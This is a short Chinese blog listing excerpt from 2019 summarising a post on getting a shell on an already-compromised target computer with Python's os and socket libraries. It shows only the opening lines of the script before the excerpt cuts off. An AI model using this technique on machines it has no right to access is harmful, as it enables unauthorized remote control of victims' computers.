摘要: 有的时候我们在获取到目标电脑时候如果对方电脑又python 编译环境时可以利用python 反弹shell 主要用到python os库和sokect库 这里的服务端在目标机上运行 from socket import * from os import * s=socket(AF_INET,SOCK 阅读全文
posted @ 2019-06-25 10:34 紅人 阅读(902) 评论(0) 推荐(0)